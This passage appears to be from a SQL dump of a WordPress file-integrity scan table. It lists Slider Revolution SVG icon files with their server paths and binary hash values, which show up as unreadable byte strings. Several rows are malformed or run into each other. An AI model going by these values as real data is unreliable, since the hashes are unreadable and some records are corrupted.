B','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_iridescent_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_iridescent_24px.svg',0,'ˮ%t%','ˮ%t%','OQT_f8:4ʌOH?2','',0,'?'),('M墒6BO>','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_sunny_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_sunny_24px.svg',0,'E<5]ֶx','E<5]ֶx','EMHJHh|Fj','',0,'?'),('܍<\'ӌ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_add_location_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_add_location_24px.svg',0,'\0`>8\n8','\0`>8\n8','x11&2^*J/c@fK~<.[_,','',0,'?'),('J~_#)#n','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_beenhere_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_beenhere_24px.svg',0,'l)Y!!NJ{e1','l)Y!!NJ{e1','b״\0ۧ^S:t]VWđ2','',0,'?'),('Нs&1p','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_24px.svg',0,'ԡI\\7g;;Ie','ԡI\\7g;;Ie','}<1@m+9O!=4=sr','',0,'?'),('\08qat0曑','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bike_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bike_24px.svg',0,'d9BVt9m','d9BVt9m','|*\'SlZy!b(\"?5haRۑQ','',0,'?'),('BvgqMܑh','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_boat_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_boat_24px.svg',0,',|Ev ʬ ',',|Ev ʬ ','Mke&eЩuyũ,F ','',0,'?'),('p w/NlCP]U','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bus_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bus_24px.svg',0,'\ZV~q^','\ZV~q^','XMNjѻlYkx[8r\\;Hd?ۂ','',0,'?'),(' M\"౎s=]O','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_car_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_car_24px.svg',0,'׎ZXkux','׎ZXkux','˜CX.a2}/~ ݊UB{','',0,'?'),('BD`l$','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_railway_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_railway_24px.svg',0,'+HF|z~ ^-0','+HF|z~ ^-0','\0KI zCY\r.DO +','',0,'?'),('K+T5 L','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_run_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_run_24px.svg',0,' Pצ}eX',' Pצ}eX','ѹx:I4g U^v5\'-}','',0,'?'),(';1䧉r2I','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_subway_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_subway_24px.svg',0,'%a_q?=','%a_q?=','麸HLK*s+3y\rj† 5','',0,'?'),('Vη;jb6XF','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_transit_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_transit_24px.svg',0,'%a_q?=','%a_q?=','麸HLK*s+3y\rj† 5','',0,'?'),('^jIGβt','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_walk_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_walk_24px.svg',0,'QoLmi-','QoLmi-','F,O:c(+Gr','',0,'?'),('Vv)~k','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_edit_location_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_edit_location_24px.svg',0,']#b -',']#b -','а\"0kv[ׯ1.`fi]F','',0,'?'),('FrK~Aj#S\'A','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_flight_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_flight_24px.svg',0,'Aہ&lo|[E','Aہ&lo|[E','P\'ooLC~ovPad}~ ','',0,'?'),('w_9MzG','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_hotel_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_hotel_24px.svg',0,'1<io X','1<io X','hzΝ&:I+9~Cy@J/s2i\n','',0,'?'),('jO򟴸Rc T','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_24px.svg',0,'gs6cUQWF','gs6cUQWF','fTHșTKE۬J ^5]^','',0,'?'),('Q\\@ɉ*m','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_clear_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_clear_24px.svg',0,'?h -sJ','?h -sJ','2%r?5ɗ9%ďLu_K ','',0,'?'),(' Ƭ0\nHܣ>8@','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_activity_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_activity_24px.svg',0,'?z/OTZF','?z/OTZF','\'A$\0M$6%Oxh=NYUꅠҸ','',0,'?'),('m6hDF\n','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_airport_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_airport_24px.svg',0,'}fY6Xq\'','}fY6Xq\'','q:I \\4BTڙ@o@ms','',0,'?'),('_J&~','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_atm_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_atm_24px.svg',0,'qѸWm','qѸWm','e}wR4\'p&D)#','',0,'?'),('a6z\n^a','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_bar_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_bar_24px.svg',0,'CH-]VHR','CH-]VHR','ˢZ$ {tm9}0\r','',0,'?'),('jU]ɚ]D̞߼4\r','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_cafe_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_cafe_24px.svg',0,'~)Q,\0m','~)Q,\0m','¯=shֳB=LOEaq','',0,'?'),('[fȲ^džp:','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_car_wash_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_car_wash_24px.svg',0,'VE$}F-?Xu','VE$}F-?Xu','vQPHQ#_)[E','',0,'?'),('vuv<#','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_convenience_store_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_convenience_store_24px.svg',0,'*\0D','*\0D','Ї#\\9s^Mk |I $ƃG[\r8','',0,'?'),('wADtRG:$TPI','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_dining_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_dining_24px.svg',0,'kxxj@h3 G','kxxj@h3 G','¿Sx>F4j,7 ϵlX2]_','',0,'?'),('shC]6̔_','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_drink_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_drink_24px.svg',0,'FVLh','FVLh','Ǝt< ߍZu gFr1','',0,'?'),('cWZq܆','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_florist_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_florist_24px.svg',0,'TY*Ui','TY*Ui','\Z.2qNbjỳP9[vι','',0,'?'),('=ol,f8S','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_gas_station_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_gas_station_24px.svg',0,'_<݊` ڲa}m','_<݊` ڲa}m','(tw8FD gj$>\0J','',0,'?'),('1Ƀ٢@@:','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_grocery_store_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_grocery_store_24px.svg',0,'|F5CV:','|F5CV:','Ԟe;nTGKk`߈68','',0,'?'),(' ՜f+!X_~c','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hospital_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hospital_24px.svg',0,'E $QNj','E $QNj','PgҮM!sU Ap_4ʉݚpg','',0,'?'),(' } 0+gj','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hotel_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hotel_24px.svg',0,'1<io X','1<io X','hzΝ&:I+9~Cy@J/s2i\n','',0,'?'),('^3d NkŦ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_laundry_service_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_laundry_service_24px.svg',0,'>yl;6pFV','>yl;6pFV','<-p936ћh9c#Fae','',0,'?'),('%8Âo׿','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_library_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_library_24px.svg',0,'`}3`ao\ZfzD ','',0,'?'),('ʸvsQBC','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_movies_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_movies_24px.svg',0,'H\r2Rڤ','H\r2Rڤ','jf0k ߶zc~ъ@r^f0.','',0,'?'),('Pi8=1<\"7ۮ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_offer_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_offer_24px.svg',0,'^|`۪','^|`۪','\\ra0Vwlt1.h{=gȀ','',0,'?'),('m,c)\"~;̵','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_parking_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_parking_24px.svg',0,'V\rƱ=Ɛ)r','V\rƱ=Ɛ)r','s#-!/t0 ~ ~','',0,'?'),(' -8yhN1]','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pharmacy_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pharmacy_24px.svg',0,'$ 9GsjL','$ 9GsjL','0\nG\ZrQF',')>0\nG\ZrQF',']$pz:\'CR\0syL9#?','',0,'?'),('ap v3x3?4\rG:','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_see_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_see_24px.svg',0,'Oa6Y%C','Oa6Y%C','l6ꏀ].rC\r;E','',0,'?'),('5Y\n+/9\\Γh','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_shipping_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_shipping_24px.svg',0,'[(3KPu@zpA','[(3KPu@zpA','d\0pQ7E{(H%g8\'92*','',0,'?'),('Vm)Ɗ)~ע','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_taxi_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_taxi_24px.svg',0,'*Tc+a0','*Tc+a0','AOdƁ{ߺzWqO\\ s','',0,'?'),('@!LIc','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_map_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_map_24px.svg',0,'늯БFu','늯БFu','ME6 <_V\"m\'^.','',0,'?'),('dߩ*-i= ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_my_location_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_my_location_24px.svg',0,'G~)5o!g','G~)5o!g','W?ړ-JAV۩TS`o{+','',0,'?'),('=8z(s0gp_','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_navigation_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_navigation_24px.svg',0,'ʏ2cLi\rĭ#`+','ʏ2cLi\rĭ#`+','ɔeV%_ X\"Cw衢 i0','',0,'?'),('fގw#=T','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_near_me_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_near_me_24px.svg',0,'%|3~u','%|3~u','m 9\'oYYI{ r','',0,'?'),('S\"%K','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_24px.svg',0,'-N0|Vn\"','-N0|Vn\"','=*/gك\r\0gZ]%','',0,'?'),('|S4:lŪ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_circle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_circle_24px.svg',0,'eD\\=Ϳ\ZT','eD\\=Ϳ\ZT','>}\0,\"% \0%nse2р[y','',0,'?'),('$0\"\r2$ϑ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_pin_drop_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_pin_drop_24px.svg',0,'g^4C\\p\Z','g^4C\\p\Z','ݺM.bz9\r=~ȉ#O','',0,'?'),('k%]\rSY.MgR','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_place_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_place_24px.svg',0,'I}Ԛ^޵Q\Zw','I}Ԛ^޵Q\Zw','\\]:0cA7kT` (\0','',0,'?'),('ZxZ-l?','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_rate_review_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_rate_review_24px.svg',0,'Mb:h~}*\\Yt','Mb:h~}*\\Yt','KlOo̠YǮcKBy]39 ','',0,'?'),('$Dd|*Һ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_restaurant_menu_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_restaurant_menu_24px.svg',0,'kxxj@h3 G','kxxj@h3 G','¿Sx>F4j,7 ϵlX2]_','',0,'?'),('ث\05WK=3Q','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_satellite_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_satellite_24px.svg',0,'Aw..AEC.ȃ','Aw..AEC.ȃ','NJފuz8 R3Cե','',0,'?'),('Ţ\\,$\n^_O','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_store_mall_directory_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_store_mall_directory_24px.svg',0,'Cؗ5D=_E','Cؗ5D=_E','TW+ݳ4\r$Y.&}\0v','',0,'?'),('Kg. zr','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_terrain_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_terrain_24px.svg',0,'Dp\0)[Y','Dp\0)[Y','E酲.~I/tKޖDXy{E','',0,'?'),('d Tṷ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_traffic_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_traffic_24px.svg',0,'H@hO#Y) ','H@hO#Y) ',' 6`܀*oQXR\Zwk\'Fd!','',0,'?'),('XgEŌJ','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_zoom_out_map_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_zoom_out_map_24px.svg',0,'`6c -dO_','`6c -dO_','ط*i?5}@Nzi`QSƆƓ8TGL','',0,'?'),('V a+•E0p','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_24px.svg',0,'|{->9*x','|{->9*x','PH\'! N30k\'\'Z?kOWG','',0,'?'),('-Ȝ\"r.+0|','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_36px.svg',0,';?bXƿ\\',';?bXƿ\\','3CJ;C]Q+FngCʝt','',0,'?'),('aKyl^*n솖','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_24px.svg',0,'~ThO','~ThO','0se]\nIܬ/:c†hmO#','',0,'?'),('o!GZ','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_36px.svg',0,'B?.GwgP','B?.GwgP','BNǃV[Q@J2c8B!\r8Nt','',0,'?'),('A!9 iFp','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_downward_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_downward_24px.svg',0,'Zm) -!A','Zm) -!A','QPdJws*jZl}[ u\"Z','',0,'?'),('>|\Z.\'8+R','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_24px.svg',0,'!H293T','!H293T','y|UpDF9y','',0,'?'),('.-\\.r','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_36px.svg',0,'SA@g','SA@g','\"6=A<ӦŹ)\"E','',0,'?'),('׷FZYd? ','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_upward_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_upward_24px.svg',0,'ɈB2cj\r>4','ɈB2cj\r>4',']/7s{wsif`IQwV,\"J','',0,'?'),('1:OG춀\\M}','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_24px.svg',0,'B.RpcR1[q','B.RpcR1[q','i?MOQz3翖$.|;fk','',0,'?'),('e!3%pu','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_36px.svg',0,'4TvW4','4TvW4',' XK#f O|[\n','',0,'?'),('Z+̷5G','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_24px.svg',0,'K;\"6\ZGpʟ','K;\"6\ZGpʟ','~}U*^5\0!1^čHl39a','',0,'?'),('|07-6Y','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_36px.svg',0,'k,ZM6C','k,ZM6C',' vH+T˶8(yeŠAn','',0,'?'),('_,S)$\0','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_24px.svg',0,'իr) ','իr) ','^^Ղ{;O՝tHbBBO]U\nv','',0,'?'),('*\' N.\"%c멒','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_36px.svg',0,'*_c6aѫ[oq7','*_c6aѫ[oq7','M5XhDd?tYꁥb2:|1J.','',0,'?'),('gj3!\r@}','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_24px.svg',0,'/3\\-%C','/3\\-%C','Ɉ>5~D.51ōݿ@8KiRrK\'','',0,'?'),('s9g#^a[;','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_36px.svg',0,'dblj*s','dblj*s','ww X\0O@Hd2[{sNi','',0,'?'),('|:\"}\' b','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_24px.svg',0,'F_\Zd\"','F_\Zd\"','MrY5tJ$YI ?^','',0,'?'),('bdaQJY4','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_36px.svg',0,'7\">.}}\ZB?P4N','7\">.}}\ZB?P4N','ˉåBhPZ@?vF)更16','',0,'?'),('DmZ)D;B%>I','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_24px.svg',0,'C`B9ߟV,','C`B9ߟV,','rb=PtlC5wdNyLaR~Uk','',0,'?'),('X\r8ژV \'dR','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_36px.svg',0,'bwk$I(#b/','bwk$I(#b/','b7Si]p,!iQX}03ߩTCh','',0,'?'),('pT-9Z`>~','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_24px.svg',0,'wDzNv#Lηl','wDzNv#Lηl','$\nV?H\ra2G (\"Uz\')Cs','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_24px.svg',0,'\'!.L|*','\'!.L|*','Թ?e\\\rHȔ#k !vj^z+','',0,'?'),('t/02I\'','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_36px.svg',0,'\'_|<%Kx]u','\'_|<%Kx]u','K;j4kN\"6;@AV|SS','',0,'?'),('B! 6`` e','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_24px.svg',0,'OsTJ٪ g','OsTJ٪ g','+ۑ=qDX3d,!','',0,'?'),('^A=vV\Z','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_36px.svg',0,'L:F&g','L:F&g','9(SjB[sR첍\\\Z!k','',0,'?'),(',\'P?Cu','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_24px.svg',0,' Oa7M[|',' Oa7M[|','yEmqц)G+#wZ4ݹ','',0,'?'),('W]d(~i','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_36px.svg',0,')VS=G(,',')VS=G(,',']ÖL duɒyI,3','',0,'?'),('H?l2t,','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_24px.svg',0,'\"݊Il9knٛ','\"݊Il9knٛ','s !E\\)|܇R!4Zg̃','',0,'?'),('\n@6&O\r<{Sj','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_36px.svg',0,'44gd3&','44gd3&','Ն^dx}yI04\0 3,EAU','',0,'?'),('x mCFuCl&w','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_24px.svg',0,'lx1%f','lx1%f','Ha\'2 \\RF\rݴ2-','',0,'?'),('oY2=A*<','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_vert_36px.svg',0,'6=[','6=[','7Žh+^j*\n(\n\\ G*pCP','',0,'?'),('eQy|h.#y','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_24px.svg',0,'aw\r}O\rqsEP\0U@H','aw\r}O\rqsEP\0U@H','Hn;XNei@VDH-ܱ$\'NV','',0,'?'),('TE?jz','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_refresh_36px.svg',0,'z٤*gb','z٤*gb','#ON4OG,\0ۢQ,4_5k[P)','',0,'?'),('KzԼR]6\\','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_left_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_left_24px.svg',0,'M0dx.5','M0dx.5','f/xq\0Z|Li[)]','',0,'?'),('uVA&WysOX','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_right_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_subdirectory_arrow_right_24px.svg',0,'ͷEɻJE7','ͷEɻJE7','@_\'h%BüO?B\'','',0,'?'),('Lʵ*\0\03 ','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_24px.svg',0,'vT\'vD','vT\'vD','Y- 3{?M#\"udE','',0,'?'),('}DixHCz^T\0Y','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_36px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_less_36px.svg',0,'1C)$[{','1C)$[{','uyζ`Ɣvܸ\ZYd UT&\Zf','',0,'?'),('9qr 